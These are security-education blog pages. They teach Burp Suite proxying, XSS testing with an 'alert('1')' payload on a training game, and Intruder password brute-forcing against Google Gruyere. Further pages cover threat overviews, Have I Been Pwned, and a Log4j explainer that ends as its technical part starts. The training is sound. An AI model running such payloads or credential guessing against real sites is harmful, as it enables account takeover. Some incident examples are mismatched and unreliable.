Burp Proxy allows you to intercept HTTP requests and responses sent between Burp's browser and the target server. This allows you to study how the website behaves when you perform different actions.

But how does a proxy work?

<figure><img src="/files/ELwiWONxrjf0a2lt3TpA" alt=""><figcaption></figcaption></figure>

## How does a proxy work?

### Definition

{% hint style="info" %}
A proxy is essentially an intermediary between your computer (or whatever device you use to access the Internet) and the website or service you are trying to access. When you use a proxy, your Internet request is sent first to the proxy server, then it sends it to the Internet on your behalf and receives the response, which is then forwarded to your device. This can provide privacy and security benefits because the website or service does not directly see your device, but rather the proxy server.
{% endhint %}

### Plan

To visualize the process, here is a simple diagram:

<figure><img src="/files/2cT01Qhu7q2A7fHBSeKq" alt=""><figcaption></figcaption></figure>

Because a proxy server has its own IP address, it acts as an intermediary between a computer and the Internet. Your computer knows this address, and when you send a request over the Internet, it is routed to the proxy, which then receives the response from the web server and transmits the page data to your computer's browser, such as Chrome , Safari, Firefox or Microsoft Edge.

## Examples of use

1. Anonymity: Proxies can hide your real IP address, making it difficult for websites to track your online activity.
2. Security: Proxies can filter incoming traffic to block potential threats before they reach your device.
3. Bypassing geographic restrictions: For example, if certain content is only available to users in a certain region, you can use a proxy located in that region to access it.

## Types de proxy

There are different types of proxies, some examples of which are:

1. HTTP Proxy: These are the most common types of proxies used for web traffic. They can help hide your online identity and access blocked websites.
2. SOCKS Proxy: Unlike HTTP proxies, SOCKS proxies can handle any type of traffic, not just web traffic. They are therefore more versatile, but also slower.
3. Transparent Proxies: These proxies do not hide the user's IP address and are often used for content caching and large-scale networking.
4. Anonymous proxies: These proxies hide your IP address, but they tell websites that they are a proxy. They offer a certain level of anonymity, but not as much as so-called “elite” proxies.
5. Elite Proxies: These proxies hide both your IP address and the fact that they are a proxy. They offer the highest level of anonymity.

The actual uses of these proxy types vary. For example, an HTTP proxy can be used for anonymous web surfing, while a SOCKS proxy can be used for torrenting. Transparent proxies are often used by enterprises for content caching and load balancing, while anonymous and elite proxies can be used for activities requiring a high level of privacy and anonymity.

## Proxy HTTP avec BURP

### Browser via BURP

Burp Proxy allows you to intercept HTTP requests and responses sent between Burp's browser and the target server. This allows you to study how the website behaves when you perform different actions.

1. Launch Burp Browser:

* Go to the Proxy > Interception tab.

<figure><img src="/files/arChXALmCMuRu965x9zq" alt=""><figcaption></figcaption></figure>

* This launches the Burp browser, which is preconfigured to work with Burp directly:

<figure><img src="/files/GgEtz6KlHEJILwa1B3ll" alt=""><figcaption></figcaption></figure>

## Manual configuration

It is possible to configure your Browser so that it can intercept requests without using the default BURP Browser.

**Addon: FoxyProxy**

An Addon allows you to facilitate configuration. It exists on Firefox and Google Chrome.

<figure><img src="/files/NKdMvTNlvAK97iJydqSo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3p5cOwCma3KVEe4ns9tk" alt=""><figcaption></figcaption></figure>

**Configure the Addon**

1. Open addon option

<figure><img src="/files/X6FuhzceJ12ZKy7dt3iG" alt=""><figcaption></figcaption></figure>

2\) Add your configuration

<figure><img src="/files/RK6FyHrDjeHPudgJcsMa" alt=""><figcaption></figcaption></figure>

* Nom: Burp Proxy
* Type de Proxy: HTTP
* IP address: 127.0.0.1 (which you can find in the BURP options)
* Port: 8080 by default (you can change it also in BURP options)

<figure><img src="/files/8OdvJeZyFahMXynwyf2A" alt=""><figcaption></figcaption></figure>

* To safeguard

3\) Result:

<figure><img src="/files/zIgjcB3hLrV2G0rFnaRj" alt=""><figcaption></figcaption></figure>

## Intercept an HTTP request

### Intercept

Click the “Intercept is off” button so that it changes to “Intercept is on”.

<figure><img src="/files/0UWaZ5QKBRI98k9sKtNC" alt=""><figcaption></figcaption></figure>

Using Burp's browser or your browser with the FoxyProxy addon, try visiting a site (example: google.com) and observe that the site does not load.

The Burp proxy intercepted the HTTP request issued by the browser before it could reach the server. You can see this intercepted request in the Proxy > Intercept tab.

<figure><img src="/files/lQI75YVFMEz7aX8EHvRS" alt=""><figcaption></figcaption></figure>

The request is kept here so that you can study it, or even modify it, before transmitting it to the target server.

## Forward the request

Click the "FORWARD" button several times to send the intercepted request, and all subsequent ones, until the page loads in Burp's browser.

<figure><img src="/files/gCPO4DbgEmfwxnbGVII2" alt=""><figcaption></figcaption></figure>

## Disable interception

Due to the number of requests that browsers typically send, you often won't want to intercept every single one. Click the “Intercept is on” button to turn interception off.

To test that requests are no longer intercepted, return to the browser and confirm that you can now interact with the site as usual.

## View HTTP history

In Burp, go to the Proxy tab > HTTP History. There you can see the history of all HTTP traffic that passed through the Burp proxy, even when interception was disabled.

<figure><img src="/files/TlbH6F119xuyADR5g7dd" alt=""><figcaption></figcaption></figure>

Click any history entry to view the raw HTTP request, along with the corresponding server response.

<figure><img src="/files/KvQd9sZg4Ot7Qa1Xqeku" alt=""><figcaption></figcaption></figure>


# Define the perimeter

The target scope tells Burp which URLs and hosts you want to test. This allows you to filter traffic generated by your browser and other sites, so you can focus on the traffic that interests you.

<figure><img src="/files/51OpPDGrYBt5KHV7TqSx" alt=""><figcaption></figcaption></figure>

## Google Gruyere

This site imitates the principles of a very basic social network, where you can create a user profile (pinned name, photo, message and website...), manage it and post short messages (snippets in this case ), so it is very suitable as study material.

Here is the link: <https://google-gruyere.appspot.com/>

The link will direct you to your instance (see image below, behind the URL there is my instance number).

<figure><img src="/files/jSynVXFr3sccewocyRvz" alt=""><figcaption></figcaption></figure>

The lab shows how vulnerabilities in web applications can be exploited and how to defend against these attacks. In the lab, you will practice cross-site scripting (XSS), cross-site request forgery (XSRF),... and you will also have the opportunity to evaluate the impacts of such vulnerabilities (denial of service, disclosure of 'information, remote code execution...).

## Start your Proxy

Depending on what you are using, start either the BURP browser or your FoxyProxy addon.

Then, you go to the URL of your GRUYERE via your browser:

{% hint style="info" %}
[https://google-gruyere.appspot.com/658170968763XXXXXXXXXXXXXXXXXXXXXXXXXX/](https://google-gruyere.appspot.com/658170968763413448899493058955923664773/)
{% endhint %}

Now try browsing the app a little by clicking on the features you see:

* Sign In
* Sign Up
* Home

## Analyze your Proxy traffic

In Burp, go to the Proxy tab > HTTP History. For easier reading, continue clicking the leftmost column header (#) until the requests are sorted in descending order. This way you can see the most recent requests at the top of the screen.

<figure><img src="/files/bwAPo1oMNbXEBXKQX3AS" alt=""><figcaption></figcaption></figure>

Note that HTTP History displays details of every request made by the browser, including requests to third-party websites that are not of interest to you.

## Set the target

Go to Target > Site map. In the left panel, you can see a list of hosts that your browser has interacted with. Right-click on the target site node and click “Add to scope”. When prompted in a pop-up, click Yes to exclude traffic out of scope.

<figure><img src="/files/q8zRIeWOZHQnGP085FVZ" alt=""><figcaption></figcaption></figure>

Click the display filter above HTTP History and select Show only items in scope.

<figure><img src="/files/sgpAPI9dBLHvkLG9pDCJ" alt=""><figcaption></figcaption></figure>

Scroll through your HTTP history. Notice that it now only displays entries from the target website. All other entries have been hidden. This greatly simplifies the history, which now only contains the elements that interest you.

If you continue browsing the target site, you will notice that out-of-scope traffic is no longer recorded in the sitemap or proxy history.


# Intruder et Repeater

Repeater

Burp Repeater is a tool that allows you to edit and send an interesting HTTP or WebSocket message repeatedly.

You can use Repeater for all sorts of purposes, for example to:

* Send a request with varying parameter values ​​to test for input-based vulnerabilities.
* Send a series of HTTP requests in a specific sequence to test for vulnerabilities in multi-step processes, or vulnerabilities that rely on manipulation of connection state.
* Manually check issues reported by Burp Scanner.

Repeater lets you work on multiple messages simultaneously, each in its own tab. All changes made to a message are saved in the tab's history. The grouping feature allows you to easily manage a large number of open tabs.

Sending a request to Burp Repeater

The most common way to use Burp Repeater is to send it a request from another Burp tool. In this example, we will send a request from the "Proxy > Intercept" tab.

### Target

For this part, we will use the following target:

* <http://xss-game.appspot.com/>

It is a "game" mode application which has several levels of XSS vulnerabilities.

Little reminder:

{% hint style="info" %}
XSS:

Cross-site scripting (XSS) is a security vulnerability that allows an attacker to inject malicious client code into a website. This code is executed by victims and allows attackers to bypass access controls and impersonate users. According to the Open Web Application Security project, XSS was the third leading cause of web application vulnerabilities in 2013.\
\
Definition: [**DEVELOPPER.MOZILLA.ORG**](https://developer.mozilla.org/fr/docs/Glossary/Cross-site_scripting)
{% endhint %}

### Step 1: Send request to Repeater

In the previous tutorial, you learned how to intercept a request. We will do the same with level 1 on our target.

In the first level we are asked to enter a request in the search bar, so we will intercept this request:

<figure><img src="/files/pvzyXCpNbFEZsnuLfenY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OTiMkLwYGon6ZpFm8DOo" alt=""><figcaption></figcaption></figure>

Now we will right-click on the query and do "Send to Repeater" or the keyboard shortcut "CTRL-R":

<figure><img src="/files/P1ZKS9xZoyt5cpXAP5ES" alt=""><figcaption></figcaption></figure>

In the "Repeater" tab we see our request on the left, once we click on the "Send" button we see the response appear on the right pane:

<figure><img src="/files/3XDZIFmjYZkgFySrSQ2q" alt=""><figcaption></figcaption></figure>

### Step 2: Change the value in the Repeater

It is therefore possible to modify our query on the left to try to find the flaw and move to level 2 of our XSS game.

Let's try replacing the value of "query" with "alert('1')".

{% hint style="info" %}
alert('1') is an XSS payload. The alert() function in JavaScript allows you to display a "pop-up" window to display the message (in our case the number 1).

This payload is widely used and it allows us to have a visual directly on our browser if the function is called.
{% endhint %}

<figure><img src="/files/T6QxqEKa7dBlDZRiTVgL" alt=""><figcaption></figcaption></figure>

We see in the output that my script tags are still intact, which means our XSS attack could work.

From there, we have two options:

* Copy/paste the URL with the payload into the website and test it manually;
* Use Burp to automate a browser request.

For the demonstration we will show the input directly on the site:

* In the search bar, we enter our payload:

<figure><img src="/files/c41Bta3QKUCy8fDGUOSt" alt=""><figcaption></figcaption></figure>

* The result:

<figure><img src="/files/4SjC8rGPyvt0sgDLQ70D" alt=""><figcaption></figcaption></figure>

-> We do get a “pop-up” which indicates that the vulnerability has been exploited and that we can move on to the next level.

* The answer to our query:

<figure><img src="/files/FakabKeVooyO7UE337OQ" alt=""><figcaption></figcaption></figure>

-> Same as the one we have in the Repeater

### Conclusion

Repeater is a manual alteration tool that allows you to copy requests from other tools (Proxy, Target, etc.) and modify them before sending them again to the target. The Repeater makes it easy to modify the payload and also provides links to quickly repeat the attack in the browser.

That's our introduction to the Repeater, now let's move on to the intruder!

## Intruder

Let's imagine we want to log in to an application but we don't know the username or password. We could copy a login request into the Repeater tool, then manually select the username and password and replace them each time with options from a list.

Of course, we would have to do this hundreds, if not thousands, of times. If we want to automate a process like this, where we have a changing parameter and a known set of values ​​that we want to try, then it's time to use the Intruder tool.

{% hint style="info" %}
Burp Intruder is a tool for automating custom attacks against web applications. It allows you to configure attacks that send the same HTTP request repeatedly, each time inserting different payloads in predefined positions.
{% endhint %}

## Target

For this part, we will use the Google Gruyere application which allows us to connect to an account.

## Step 1: Send the request to the Intruder

As we did for the Repeater, we will intercept the connection request with the username and password.

The connection function is "Sign In" in Google Gruyere:

<figure><img src="/files/EO5FlWxzfnbKx6YVPWSc" alt=""><figcaption></figcaption></figure>

{% hint style="danger" %}
Avant de faire le tuto Intruder, utilisez la fonction "Sign up". Elle permet de créer un compte on the app. In my example, the user has the name "test".
{% endhint %}

**The query captured on Burp:**

<figure><img src="/files/bJz7C6gth1ycs66lBSDP" alt=""><figcaption></figcaption></figure>

Now we will right-click on the query and do "Send to Intruder" or the keyboard shortcut "CTRL-I":

<figure><img src="/files/26Tk6V6BHuSd55j6pQDm" alt=""><figcaption></figcaption></figure>

### Step 2: Change Values ​​in Positions Tab

In the "Intruder" tab we see several tabs as well as our query:

* First of all, we notice that values ​​are highlighted:

<figure><img src="/files/Wa7CNWxuUso1yPiVcsBU" alt=""><figcaption></figcaption></figure>

-> We will therefore "Clear" all the information and just select the password value (behind the "pw=").

<figure><img src="/files/PuvcMpQYEEIKuWaboXiL" alt=""><figcaption></figcaption></figure>

#### Types of attack

We will define the different types of attack:

{% hint style="success" %}
**S**Nipper:

This attack places each payload in each payload position in turn. It uses a single useful data set.

The total number of requests generated by the attack is the product of the number of positions and the number of payloads in the payload set.

The Sniper attack is useful for scanning a number of request parameters individually to detect common vulnerabilities.
{% endhint %}

{% hint style="success" %}
**Battering Ram**:

This attack simultaneously places the same payload in all defined payload positions. It uses a single set of payloads.

The total number of requests generated by the attack corresponds to the number of payloads in the payload set.

The "Battering Ram" attack is useful when an attack requires the insertion of the same data in several places in the request. For example, a username in a cookie and a request body parameter.
{% endhint %}

{% hint style="success" %}
**Pitchfork:**

This attack iterates through a set of different payloads for each defined position. Payloads are placed simultaneously in each position. For example, the first three queries would be:

* First request:

Position 1 = First payload of set 1.

Position 2 = first payload of set 2.

* Second request:

Position 1 = Second payload of set 1.

Position 2 = second payload of set 2.

* Third request:

Position 1 = Third payload of set 1.

Position 2 = Third payload of set 2.

The total number of requests generated by the attack is the number of payloads in the smallest payload set.

The Pitchfork attack is useful when an attack requires inserting different but related data into multiple places in the request. For example, to place a username in one parameter and a known ID number corresponding to that username in another parameter.
{% endhint %}

{% hint style="success" %}
**Cluster bomb:**

This attack iteratively uses a different set of payloads for each defined position. Payloads are placed from each set in turn, so all payload combinations are tested. For example, the first three queries would be:

* First request:

Position 1 = first payload of set 1.

Position 2 = first payload of set 2.

* Second request:

Position 1 = first payload of set 1.

Position 2 = second payload of set 2.

* Third request:

Position 1 = First payload of set 1.

Position 2 = Third payload of set 2.

The total number of requests generated by the attack is the product of the number of payloads in all defined payload sets - this number can be extremely high.

The cluster bomb attack is useful when an attack requires the insertion of unknown or unrelated data in multiple places in the request. For example, when it comes to guessing a username and password.
{% endhint %}

In our case, we have the username and we need to find the password, so we need the Sniper attack.

## Step 3: Change Values ​​in Payload Tab

We'll use "Simple list" as the payload type, but there are many other options, like "numbers", which could be used to find identifiers or modify a value in a longer string.

If you have the Pro version, you can use predefined lists in Burp. If you're using the free version, you can either load a list (e.g. "Rock you" for passwords, etc.) or create your own list.

For this example, I'll create my own list of 10 possible passwords by typing them in and clicking add. Since payload "1" was selected in the payloads section, this applies to my first parameter, which is the password.

<figure><img src="/files/mqrS8D6i7pTIv2foBt9I" alt=""><figcaption></figcaption></figure>

We now see that the number of requests is 10, which makes sense. I have 1 username (Test) and 10 passwords.

If we try all the combinations (since we have set our attack type to "Sniper"), we will have 10 requests in total.

Then we click on “Start Attack” in the “Payload Sets” options. If you have the free version, your attacks will be limited, so large lists will take a long time. However, the 10 requests should be processed very quickly.

Once the attack is launched, we have a pop-up window open that lists all the requests. v

As soon as the attack is finished, we notice that one of the payloads has a greater value in the length of the response:

<figure><img src="/files/ndvGujpcyIZeVhLlkC3Z" alt=""><figcaption></figcaption></figure>

Since all response statuses are 200, the length would indicate that we found the right value.

{% hint style="info" %}
Code 200 OK:

The HTTP 200 OK response status code indicates a successful request. A 200 response may be cached by default.

The meaning of success depends on the HTTP request method:

* [`GET`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/GET) :the resource has been retrieved and is passed in the message body.
* [`HEAD`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/HEAD) : all the headers are present in the response, it has no body.
* [`POST`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/POST) : the resource that describes the result of an action is transmitted in the body of the message.
* [`TRACE`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/TRACE) : the message body contains the request message received by the server.

SOURCE: [**developer.mozilla.org**](https://developer.mozilla.org/fr/docs/Web/HTTP/Status/200)
{% endhint %}

Let's try our password on the login page:

<figure><img src="/files/gzFq1JjOmIOlkJLxWW5O" alt=""><figcaption></figcaption></figure>

This ends our chapter on the Repeater and the Intruder, there are of course still options to go through especially in the Intruder section, we will discuss them later


# Page 1


# Cybersecurity 2023: 5 major threats and how to protect yourself from them

As we enter 2024, the digital landscape is more complex than ever. Cybersecurity has become a top priority for individuals and businesses.

<figure><img src="/files/O3in4bgG2EfvdQAFPZ3J" alt=""><figcaption></figcaption></figure>

***

## 1. Ransomware: The digital hostage

### **Description**

Ransomware encrypts user data, demanding a ransom for decryption.

See the Be-Hacktive capsule on Ransomware!

<figure><img src="/files/PqL01IVXVoB0o8v0YwC4" alt=""><figcaption></figcaption></figure>

## Miscellaneous facts

* Belgium: Cyberattack in Belgium: the city of Liège victim of ransomware, in 2021
* France: Ransomware: hackers paralyze a French hospital and demand 10 million euros, in 2022

## Protection

Non-exhaustive list:

* Frequent data backups.
* Avoid suspicious links or attachments.
* Use up-to-date antivirus software.

***

## 2. DDoS: Server overload

### **Description**

DDoS attacks flood a site with traffic, making it inaccessible.

<figure><img src="/files/y5T2xIXJ5R8Kxz1qOqD5" alt=""><figcaption></figcaption></figure>

## Miscellaneous facts

GitHub, targeted in 2018, suffered a massive 1.35 terabytes per second attack.

### Protection

Non-exhaustive list:

* Services de mitigation DDoS.
* Robust firewalls.
* Constant traffic monitoring.

***

## 3. Phishing: The digital scam

### **Description**

Phishing attacks seek to trick the user into obtaining sensitive information.

The very first capsule of the blog talks about it :smile:

## Miscellaneous facts

In 2017, employees of Google and Facebook were victims, causing a loss of $100 million.

### Protection

<figure><img src="/files/kUHspEGKuWB3OqiQmxay" alt=""><figcaption></figcaption></figure>

***

## 4. MitM Attacks: The Sneaky Interception

### **Description**

Man-in-the-middle attacks capture communication between two parties.

<figure><img src="/files/VJ0DuXuH7AekBBET9c5X" alt=""><figcaption></figcaption></figure>

## Miscellaneous facts

In 2017, a data breach was confirmed at Equifax, exposing more than 143 million Americans. As a result, Equifax created a website called equifaxsecurity2017.com to allow its customers to see if the breach affected them.

United States: what is the Equifax affair, one of the biggest hacks in history?

### Protection

Non-exhaustive list:

* HTTPS connections exclusively.
* Avoid public Wi-Fi or use a VPN.
* Check site certificates.

***

## 5. IoT vulnerabilities: Connected objects at risk

### **Description**

The Internet of Things (IoT) is the networking of objects. It is comparable to a social network or an email provider, but IoT connects devices rather than people. Business Insider experts expect the number of connected objects to reach 47 billion by 2027.

<figure><img src="/files/qpTV4SyvwzufPAMMAlKu" alt=""><figcaption></figcaption></figure>

## Miscellaneous facts

The Mirai attack in 2016 transformed connected objects into botnets, causing major disruption.

### Protection

Non-exhaustive list:

* Change default passwords.
* Regular updating of devices.
* Disconnect unused devices.

***

## Conclusion

Cybersecurity is a constantly evolving field. By staying informed and adopting appropriate security measures, you can protect yourself against the major threats of 2023.


# Am I a victim of data leaks?

<figure><img src="/files/ZZAcdyZAfikuZLCMBUC8" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Da**ta leak:**\
A data leak occurs when an internal party or source exposes sensitive data, usually unintentionally or by accident. The results of a data breach can range from loss of information to malicious exploitation. Often, data leaks lead to data breaches.\
\
Source: FORTINET
{% endhint %}

Many of us have been involved in a data breach at some point in history, whether it was the big Linkedin breach of 2016 (and also 2021 for that matter) or the most recent of Facebook. It's a worrying fact of modern life: many of us, at one point or another in our online lives, will find our data caught in a hack.

If one of your online accounts has been hacked (often referred to as "pwned"), it's important not to panic. By following a few simple steps, you can check the extent of the damage and regain control of your account security.

![](/files/ewKU3TZLBsEQDlA7GrtH)

{% hint style="info" %}
Pwned: Refers to a person who has been beaten flatly in a video game or who has been cheated online. It has also been used to describe the act of gaining illegal access to something.

Definition: [**Wiktionary**](https://fr.wiktionary.org/wiki/pwned)
{% endhint %}

Pwned, in this context, simply means that your account has been the victim of a data leak. Data leaks exist and it is one of the unfortunate side effects of the modern, internet-connected world. And often, they have nothing to do with the fact that you, a simple user without problems, are irresponsible. Businesses can experience embarrassing data breaches, whether as a result of their servers being hacked, human error, or staff misconduct. With such a number of leaks and the intensification of cyberattacks during this year of crisis, we may be led to ask ourselves the following question:

{% hint style="danger" %}
How do I know my data has been leaked?
{% endhint %}

The best-known site for checking if your email address, or any account associated with it, has been hacked is called Have I Been Pwned.

## Have I been pwned ?

{% hint style="success" %}
Have I Been Pwned? is a website that allows users to check if their personal data has been compromised by data breaches.
{% endhint %}

The main function of this site, since its launch, is to provide the general public with a way to check whether their private information has been leaked or compromised. Website visitors can enter an email address or phone number and see a list of all known data breaches with records linked to that email address. The website also provides details about each data leak, such as the history of the loss and the specific types of data it contained.

## Checking my data

![The website home page](/files/UtZm4Hc7ioEP36fm1TJF)

1. First of all, you must enter your email address (or telephone number with indicator: BE=+32, FR=+33,...) in the search bar:

![Enter your email address and then click on pwned?](/files/8oNrZp4vPBUTrXSTu3FN)

2. If the message "Oh no - pwned!" appears, your email address is compromised:

![The email address is compromised](/files/BecMtsZd5hb2Bpz9lLUe)

<mark style="color:red;">**⚠**</mark> The email address "<test@test.com>" is present in 372 data leaks and 1394 pastes.

{% hint style="info" %}
Paste: A "paste" is information that has been added (pasted) to a public website designed to share content, such as Pastebin.

Definition:  [HaveIBeenPwned?](https://haveibeenpwned.com/Pastes)
{% endhint %}

Often, when online services are compromised, the first signs appear on "collage" sites like Pastebin. Attackers frequently post samples or complete dumps of compromised data on these services.

![Example of pasting a database on Pastebin](/files/2um2vrn4RLUDAyejaE0V)

Monitoring and reporting the presence of email addresses on sites like Pastebin can give affected users a head start in mitigating the potential fallout of a data breach.

3. Data leaks are varied because they come from several different companies. Here are some examples:

![An example of compromised data for test@test.com](/files/JGBqBMYOSGbMbXSAOFOC)

<mark style="color:red;">**⚠**</mark> Data linked to <Test@test.com> was leaked via Linkedin and Linux Forums (non-exhaustive list).

In the example above, the leaked data is:

* Email addresses
* Passwords
* Education level
* Geographic Location
* Job title
* First and last name
* IP addresses
* Nicknames

![](/files/6mQf9N2IMC3jWroyXRzB)

Indeed, if you do not have data on the internet, you do not risk any leaks. But are you sure that your email address is not linked to any account?

If, on the contrary, you have one or more accounts and some have been leaked, here is how to best react and protect yourself.

## How to react and protect yourself

While it is important to know whether your personal data or identifying information has been leaked, it is even more important to act accordingly. What should you do now, knowing that your account has been compromised?

## Change your passwords.

Log in to the compromised account and change the password. If a security question is enabled for password change, answer it, get a new password, and change the security question as well.

Next, update the passwords for all accounts for which you used the same login and password combination. Do not reuse passwords; be sure to choose different ones for each account.

## Add double authentication.

The idea of ​​two-factor authentication is that in addition to your password, you'll need to provide additional proof of identity, such as a passcode sent to your phone. This way, if your account is ever hacked, cybercriminals won't be able to access it using just your password.

## Monitor account-related payments.

Check the appropriate accounts linked to purchasing data, shopping sites or simply your bank account, for any orders you don't remember placing. The sooner you find them, the more likely you are to cancel these orders successfully.

## Inform your bank so that it can stop your card.

First call your bank, then email for proof of your report.

## Check your card statement for suspicious transactions.

Also notify the bank if there are payments that you did not authorize.

## Stay up to date

In order to protect yourself as much as possible from cybercrimes linked to data leaks, you must stay informed and react quickly.

## Activer la notification sur Have I been Pwned?

The primary function of Have I Been Pwned is to tell you if your information has been compromised. But other tools have been made available such as notification.

![To enable notifications](/files/f9VnyWZg5hPUOhow80us)

You can sign up to receive an email notification whenever your personal information is discovered in a new data breach. This will allow you to take steps to minimize the risk of fraud or identity theft, for example by changing your password for this account and any other accounts for which you have used the same password.

![Enter your email address](/files/pfSFuBaYRWSyzCVQ6RMQ)

![A verification email is sent to your inbox, you must click on the link to confirm](/files/MCYgq1xyj3cpsUMTgRaZ)

## Check password

Password reuse is normal. It's extremely risky, yet it's so common because it's easy and people aren't aware of the potential impact.

Have I Been Pwned? has implemented a tool called "Pwned Password".

This tool contains a list of hacked passwords.

![](/files/iP2IwYLfiXfxRxGwRnrd)

The hacked passwords are 613,584,246 real-world passwords previously exposed in data breaches. This exposure makes them unsuitable for permanent use, as they are much more likely to be used to take over other accounts.

#### Exemples

With the following passwords:

* <mark style="color:red;">**Test123**</mark>

![](/files/cTIsWVlxEIfg1Fin0jm5)

The password has been seen in data leaks 4703 times.

* Ln8}fE9m-Z!s

![](/files/bUwwIAFYid9H6JOqMlKp)

The password is not found in any known data leaks to date.


# LOG4J: The vulnerable bookstore that is shaking the planet

On December 9, 2021, a critical vulnerability, which affects the Java log4j logging package, was discovered.

This newly discovered cybersecurity flaw affects large areas of the internet, from Google and Amazon to the systems used to operate armies and hospitals. The US Department of Homeland Security's top cybersecurity official, Jen Easterly, called the breach the most serious vulnerability in decades.

Most hacking attempts using Log4j so far have involved attackers trying to install cryptocurrency "mining" software on victims' computers.

However, some hacker groups have also tried to use the vulnerability to break into government agencies and companies in other countries, according to cybersecurity firm Check Point.

## Definitions

First of all, some definitions so as not to get lost in certain more technical words present in the rest of this article. :smile:

{% tabs %}
{% tab title="JAVA" %}
Java is a computer technology initially developed by Sun Microsystems and then acquired by Oracle following the company's acquisition. Originally defined as a programming language, Java has evolved into a coherent set of technical and non-technical elements. Thus, Java technology includes:

* Standards
* Software
* Business communities

&#x20;                       &#x20;

Definition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Java_\(technique\))
{% endtab %}

{% tab title="Logging" %}
In IT, logging can refer to:

* journaling a file system allowing it to recover more quickly from a crash of the system
* cla logging of a system which is the backup of events out of the ordinary

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Journalisation)
{% endtab %}

{% tab title="LOG4J" %}
Log4j is an open source utility software library programmed in Java language. It is part of Apache Logging Services, a project of the Apache Software Foundation. It provides functions for managing application traces and histories.

It is used in many web applications and web services programmed in JAVA language.

Definition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Log4j)
{% endtab %}
{% endtabs %}

## First fruits

By now, most of you may have already heard about the Log4j security vulnerability (CVE-2021-44228), which has been called the “largest and most critical vulnerability in the last decade” , and may have worked to protect their organization from this vulnerability.

According to a TechSpot report, more than 840,000 attacks were launched within 72 hours of the vulnerability being disclosed and the number of attacks reached more than 100 per minute over the weekend.

This clearly shows why everyone is rushing to deploy the patch for the Log4J vulnerability.

And you are saying to yourself:

> “That’s all well and good, but we don’t necessarily understand what this vulnerability consists of and why is it so dangerous?”

Absolutely and here we come, I will divide the article into two parts to better explain to you:

* The LOG4J vulnerability for those who want to know but without going into details
* The LOG4J vulnerability for those who want to know, understand and defeat the flaw (more technical and in-depth explanations)

![](/files/KZFd5OK6Lyj4sZ1hSzRo)

## LOG4J vulnerability: A little but not too much

I got the following question from a friend who knows nothing about computers:

> Can you explain to me what happened to make all the companies so scared?

I tried by all means to find simple words to explain to him but to make someone non-technical understand a vulnerability linked to a JAVA library...

![My brain while thinking](/files/3FZuig2s0gQ71eyoHWs9)

I sent him videos and tutorials but it was still too technical for him.

Fortunately, a former colleague ANDREA BARRACU was able to find the words to explain all this with a simple and effective example.

## Screw story

One day, a super famous screw producer launched a new practical and effective range for all types of uses, and above all FREE! The screws and their instructions for use are therefore used by everyone: Large, medium and small businesses as well as DIY enthusiasts.

These screws were therefore everywhere: Doors, chairs, tables, locks, safes,... Since they were free, well made and apparently safe.

![The screws in question! (This is a pictorial example)](/files/efujlCoVb79APm6Fg0Ji)

Everything was going well in the best of all possible worlds, until the day a man discovered a way to unscrew each screw without a screwdriver but remotely via a powerful magnet. He posted his discovery on Twitter and many people abused the flaw.

![SUPER MAGNET](/files/reImAc12MKNlszO9m9OU)

Remember that screws are everywhere and therefore anyone who understood how the magnet worked could force open any door that used those screws. Obviously some doors were more robust than others and resisted attacks but others succumbed very easily. The doors were not the only targets since the screws were also in the chests, chairs, drawers,...

Exploiting the flaw is so simple that now every attacker around the office could open all the doors and drawers without much effort.

This type of screw is used in a large number of places and infrastructure which makes the problem HUGE.

Overnight, many businesses were no longer safe. An army of DIYers set about fixing and replacing this brand of screw with a new one, trying to be faster than whoever might have tried to exploit the situation.

![](/files/74GMOjozWbMr84BvEzU5)

So panic begins because there are too many screws. There are those that are difficult to change because they have been in place forever and those that have been forgotten because they are lost between old and new screws.

Companies, often, have lost the details of the specific screw they used and so that is a problem too.

Some screws were also used in the load-bearing walls of buildings and are therefore untouchable at the risk of causing everything to collapse.

## LOG4J and screws

In our story above, you have understood that the screws refer to the LOG4J library. Log4j is used by developers to keep track of what's happening in their software applications or online services. It's actually a huge log of a system or application's activity. This activity is called "logging" and is used by developers to keep tabs on user issues.

This bookseller was therefore available free of charge and used everywhere. This therefore makes the task complicated for all companies and users because it is necessary to find the places impacted by the flaw. The flaw is called LOG4SHELL (detailed explanation in the technical section) and therefore provides remote access to infrastructures.

![Scary image ](/files/Pi4ytb4zgdvBnnXKiwWA)

The library's supplier, APACHE Foundation, released version 2.17.1 to patch the problem.

{% tabs %}
{% tab title="Patcher" %}
Computer science. Develop a software patch to remedy a malfunction.

Definition: [**CORDIAL.FR**](https://www.cordial.fr/dictionnaire/definition/patcher.php)
{% endtab %}
{% endtabs %}

## Impact & Targets

The log4j security vulnerability allows attackers to remotely execute malicious code on a target computer. That is, bad actors (hackers) can easily steal data, install malware, or simply take control of a system over the Internet.

All systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.15 are impacted. This includes, among others, Atlassian, Amazon, Microsoft Azure, Cisco, Commvault, Dell, Exact, Fortinet, JetBrains, Nelson, Nutanix, OpenMRS, Oracle, Red Hat, Splunk, Soft and VMware.

You can view the full list of vulnerable software and their security status on the github of "Nationaal Cyber ​​Security Centrum (NCSC-NL)" or SwitHak.

## Conclusion

In summary, the Log4j library is present in large numbers in company infrastructures and their ecosystems. This therefore makes the task very complicated because it is necessary to find all the places likely to use the libraries with a vulnerable version and to have the necessary tools to correct the errors.

For all involved, there is both a business and moral imperative to take immediate action to mitigate the vulnerability if it exists in public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that could result in data corruption or theft and the risk of serious business disruption.

Every organization should have a mitigation plan in case such a situation arises in the future. Whether it's shutting down the offending software or immediately patching it and testing the fix before putting it back into production, teams must be ready to respond proactively within hours or even minutes.

It's time to go make yourself a coffee and get started on the technical part!

![Your brain right now!](/files/NF0Yw1UkNwB1iVYEtIL3)


# LOG4SHELL: COME, SEE, LIVE

The LOG4J vulnerability, also called LOG4SHELL, is critical and affects Apache Log4j versions 2.0 to 2.14.1. She was identified by Chen Zhaojun from the Alibaba Cloud security team.

